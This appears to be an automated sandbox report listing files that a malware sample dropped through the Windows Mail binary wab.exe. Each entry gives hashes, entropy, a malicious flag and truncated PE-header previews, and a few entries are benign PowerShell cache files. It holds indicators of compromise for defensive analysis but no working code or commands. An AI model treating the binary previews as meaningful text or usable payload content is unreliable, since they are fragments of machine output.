                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):305120
                                                                                                Entropy (8bit):6.228503123962384
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:DFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:xKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                                                                                MD5:53B080AD4D228F74C8CD989A7EA47A1A
                                                                                                SHA1:BBA52738C2A06D220B14944DCD48C9C1314115BA
                                                                                                SHA-256:C15914A8A2F7504442109FB22FEF3C8C76DC10F5F1621A27D18336CE468616D0
                                                                                                SHA-512:425B62091571FFA59B344A4E3E6F17EE7E1D5BFA182D3FE417EA7EC76FBE68330019FAFC17004C227FC90B5D8523FB0C71D61FF9238E67A26E4E48730AB67BFD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):142288
                                                                                                Entropy (8bit):6.011172190675141
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkraivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:OzB+Aw4CZNr2fYLl
                                                                                                MD5:CBF0D1C5689D989C73C63890EC44858C
                                                                                                SHA1:05CD5077D1E330666851CE83BBC1D97756B8577E
                                                                                                SHA-256:ACB8B4B0F65E35309EE1B50C516BDF43679F1D7250C25DA2D8126B7B7920D60A
                                                                                                SHA-512:5869DA0F45AE6DCA785DCE0B0619B220C74687BD3CA3E68A01591592301CF26B89FF6CBF5F8FE521CF13809C10093B0865BA53A49A77DD474FBF864819CAD889
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1640416
                                                                                                Entropy (8bit):7.892301842372348
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:jwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:8y53w24gQu3TPZ2psFkiSqwozX
                                                                                                MD5:AA658D62A81B286BF555093E0AAE22B9
                                                                                                SHA1:C0C8C8431ABA7EBCA41D047BCAC3BC481759FBCC
                                                                                                SHA-256:AA0604845394BED07D335F2A840B3375466BB6707DC0AE45A1D1587D1026567A
                                                                                                SHA-512:6F6AA71DABEA96D667E0379D691CE37284FFF7E3814392C5725256E4A9A0091B0C23DF47E04D01FCF13097474A281E8105909DAC9B7DAC98E125A2BBFCA21DC2
                                                                                                Malicious:true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 144866
Entropy (8bit): 5.808234044484307
Encrypted: false
SSDEEP: 3072:/rkcRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:vD5lZ7y4j9KT4DteUY
MD5: F9FC6C9198B51079EE2589C189FD0FF2
SHA1: AFB098F62B18E858CA1287352D5E0C1F4712BDCA
SHA-256: 4B64D3577D06DC4C74DB624776BE20600B860D8C8E8CC1F63334AA7156794B69
SHA-512: 169ED1F88471E03760789A7B5F87AE0682F54628AE74E379377B0D7FFE89EA93B40CB88C8AB59BB8A9F01646A36289C3B681EE18B1E6ADC73A229E9D794DC9E3
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 280480
Entropy (8bit): 6.179980245461866
Encrypted: false
SSDEEP: 6144:FPr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:FDQXRVTZu0GP+ZR
MD5: 370ADDBC1D77A867416A1AA2BE63DD1F
SHA1: 48FB1005A536927F94D20B289D2A583FAC85B094
SHA-256: FC50096512FB196ED5608FFC49824756C73D5CBD91D2300063C2E99FA2E00E11
SHA-512: 9ED89D8887229B9D2AAEA4C0FAE4914C7FBB333BE455AF840E3FF4E60BF95895EAF63CBDFAF19A80DCEA737EB8EC902E945AB1B645D8365FD8C2DED8BDB606EC
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4473576
Entropy (8bit): 6.558895341897284
Encrypted: false
SSDEEP: 98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
MD5: 4855130B5C1085421920C85105178634
SHA1: A33353F42A13A7250D66326F8770A286E5774729
SHA-256: 8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
SHA-512: 97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 501656
Entropy (8bit): 6.206848688272987
Encrypted: false
SSDEEP: 12288:YLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:YLOwxyNHBVEHRiSFVlDW
MD5: 37449BF94D37C1203B35D7EAEE21566E
SHA1: 553E7B35481F9087EA91DC99985DA9F9349F60DE
SHA-256: 54800DA609BCA03BA0EFD3EBA90DEC57E644D69352FA8F905FDA2DB2B8897F11
SHA-512: 51FC24DFD566AEBAB7051FC2862018DE7840A38D1BE9E092D037BF7D1ECC63821FBE391CE68FA0A4B4239A34A37526EE27D1E5FDA480AE62EAC5B1AE23752BD1
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1637776
Entropy (8bit): 6.283298841131721
Encrypted: false
SSDEEP: 24576:x7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:5Z1tKTwMZJ1XBsn/UC6dugWA
MD5: 8CFAB955578F236C5CDB06D461AE2049
SHA1: E7E38519DB3CAC5935215176B8654BEC267FD6B1
SHA-256: EAFC0DEE1D623B6DE32FFA7154CFD9AD4414350C0E2E2E5468C9B7BC03F9A923
SHA-512: 59FDA248B4FE21C505873AFEB88EA3A1A545A5EB69C6C8083A302F7FE6A8AE9CEF39EE29B95EA32CDB3F6B1F7B115C716BF3C82676556ADBDD2842A50265294B
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 224632
Entropy (8bit): 5.346658740278611
Encrypted: false
SSDEEP: 3072:/rk3FtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Stx0SA+EySaQKeUz41
MD5: 5936E6A9592A373B502A4F40CEB5D274
SHA1: BD0C0A126F79B77E6461668546FFB4B5702BFAB1
SHA-256: CFBB8E8FB6B042DB6E2293FDE43FA24B9AE2670AD0445A56DE3214E4901088F7
SHA-512: DABABC717ACD000A418A2D118EE497C65C62B1FAF4318BAF1DB53CA0D06F88F563CDAFFDF9DEB73680179EB0CED2E45F3A22B865F6B655B299CFC0450820CE08
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 431336
Entropy (8bit): 5.752299246327897
Encrypted: false
SSDEEP: 6144:lzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOV3:lzBRnCBOrsBOBf
MD5: D5945FAB44111E3D0DB2861C8AC32EDC
SHA1: FB811D4D198C79FB29A359045415EDDA3C49E877
SHA-256: A059F0CC641E7736354E4A12A830D51A930E5118AA1B95E70F1EE1486733B931
SHA-512: 4C05B14F24C1720AB7A11A982C4955D6AB395CA272927810EB4AC53AD97C577E23902340947014EB99D9E39F1FBBB09C83A185158190800A097B33711A22606B
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 175160
Entropy (8bit): 5.636057353438849
Encrypted: false
SSDEEP: 3072:/rkS/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:NtkIpdA5OfzDUeqx6u
MD5: F59DCF1E724D7EA7DFB018B3C71C8D2E
SHA1: EB71834CA1B44C7C11FCA8A77BD8522FA967A8CD
SHA-256: EA930FA7ABE8831AC22AEF0BF777A332DFCB013A44780E313C6659AEC0D52A73
SHA-512: 6C1D461DDFA42DD74847008B02D1EECA1B311BCE14FF1D139E22A0120CBFF7FF0AA0695BCA6B111236794B0616E9B0A42BEF6A3C6B6DEE2C7F4018B162A06F44
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3162480
Entropy (8bit): 6.453693784011875
Encrypted: false
SSDEEP: 49152:dnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:gs3OBj4UmOH
MD5: 35EF8966CF2F29F477E46516D8A993FA
SHA1: 979AD1DB259F4964EC546671FF151062CF61C6F0
SHA-256: 2BDF1627356719CE8433F93B92B3397D1828CC4BE2D23E991AEEB7758C2FA825
SHA-512: CAF7B8F2240F1D1995744F1FCD893E565D747B80D46D1E48BB0B321ACE166D338EF566CAD1BA441DF8FDE91FC8EF6BA7AB7F198755717EA6DB67CAE862A4730F
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1309408
Entropy (8bit): 6.458547418142826
Encrypted: false
SSDEEP: 24576:n+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:n4AA4eGua43lgUFrv
MD5: FC820BCEC712B78BA14EA3640EE769B2
SHA1: FB2466FBD7CDA915B673D193C47273207C3AEF4A
SHA-256: 7231DBFC40D9873E4BC1DC1BB1009DA4B4B2AC88DECD32C1DDE9972879AF3E80
SHA-512: A4D82FAA7F427E76A149CB4A1B71CF8FFE8AB7A2D320036619885DDD3F0FDF28F16D46B34644D89439BC9A3A018D9DBE08970A098A9FC5CF86802427745B5CCA
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 922944
Entropy (8bit): 6.405617419551067
Encrypted: false
SSDEEP: 12288:r9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:x/BrnYuqFcL3pQ+pDX
MD5: C8FAC366154F4FF47A7FBB3FE4BD2B2F
SHA1: 030C41FCF646FABD9020B957EDB47EE51D723028
SHA-256: D0715B811F5141AC52B2ADFD8BE547420A69D37705708EAD803B799D0B3EECEF
SHA-512: 454C9BACDD6AC22ED99646A851989F2003A983BF70BC36F0BC451271C77F4CF8F63291426F0ACEC9DE63E56274BDFE893FE45F62465D1A39C076355D8DCCB580
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 692064
Entropy (8bit): 7.130899608128055
Encrypted: false
SSDEEP: 12288:qskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:qsZgjS1hqgSC/izkfFjymk4HM5yJwMK
MD5: 77555D5F69BB2A59A77A0AE6C4E90E2A
SHA1: 312A7728F788511414A3AE803DC7EB85C8807FB9
SHA-256: B93B5BF45B3FB87F4BCBE2F97B41071C0C68712B3BFA2455C711DF2C9E85B7D4
SHA-512: 43D39F39C2E6F50866B4B3D9592EB0C3FDE254822A7B9206C11C7C2054BE9023A5116395F0E181A21A5F149A7C9338B4C81DC85B5304841632AC9C5C9D3BFFD4
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.8908305915084105
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5: DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1: 326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256: 383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512: B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious: false
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulLhwlz:NllUO
                                                                                                MD5:F442CD24937ABD508058EA44FD91378E
                                                                                                SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                                                                SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                                                                SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):475136
                                                                                                Entropy (8bit):6.119576160135665
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                                                                MD5:72AD21D191B58842334D32A381EA7FA8
                                                                                                SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                                                                SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                                                                SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                                                                Malicious:false
                                                                                                Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):182272
                                                                                                Entropy (8bit):6.486621682985029
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkd4WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:oBmCtnRPF9cCGr/uH0gkSdQB
                                                                                                MD5:04712BCBEE377C2B2054D801CC3C4CD2
                                                                                                SHA1:93076F652326A517F4D325DD85FAD044A7BEF755
                                                                                                SHA-256:B217D6FA0ACE851216ADF5F3CB58A8A03ABFFC15EB1DC6C1F5B11FC99F069BA4
                                                                                                SHA-512:334CB034F585CC9A53D6D69136253A3720BB64F3D4C398F40E56AF18DB692DA7800DE0D4B8BDCAFE9B031A3C280432BAF6CEBA1FA1FE5B345887E4E3337038DD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):8
                                                                                                Entropy (8bit):3.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:+mY:+mY
                                                                                                MD5:9208C89CC3882B1D7CA4FCF69D76B570
                                                                                                SHA1:49FD5F1DDED5D920DF6E0B0AEDE4CF88533992A0
                                                                                                SHA-256:C460697A80A64FD7934FD73E88B11AA8E66BE9E407E2622A3CE3704C971E136D
                                                                                                SHA-512:7A674F8B1E05D46E850485CFCBAA11E57F49CD0F3FFEBB18806479513607A6080891DF495CB9BACAC029D96CAAA4966FCED9212D23916A3225D55BE33B402B63
                                                                                                Malicious:false
                                                                                                Preview:.C..&A
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):441484
                                                                                                Entropy (8bit):5.949681051539349
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:SYx48eSdC5bGAsSdagHSJfc5TJMADVRaEINdSuzkFCzLlfrgyr28zA7P7eBBfs4:ZGodC5bSsagqfKrYfk+lvZBy4
                                                                                                MD5:55CA93FBEAA671E53D34C80FE6912D87
                                                                                                SHA1:9F722FBAF5C5353347AFBDE9D3840CBF38F45FB9
                                                                                                SHA-256:6DDEB5617A35CB4F0975B03118587F8D77F0F06DCDF13BC8532CAA37BBA195AD
                                                                                                SHA-512:79352E41E4691142721EFADC4BAC30804A2B89C3464A474017950063FDE46FF9F779E1506DF459E10FD87829B1CBD02E5199B863A059AEF55E7914E358E05C8D
                                                                                                Malicious:false
                                                                                                Preview:
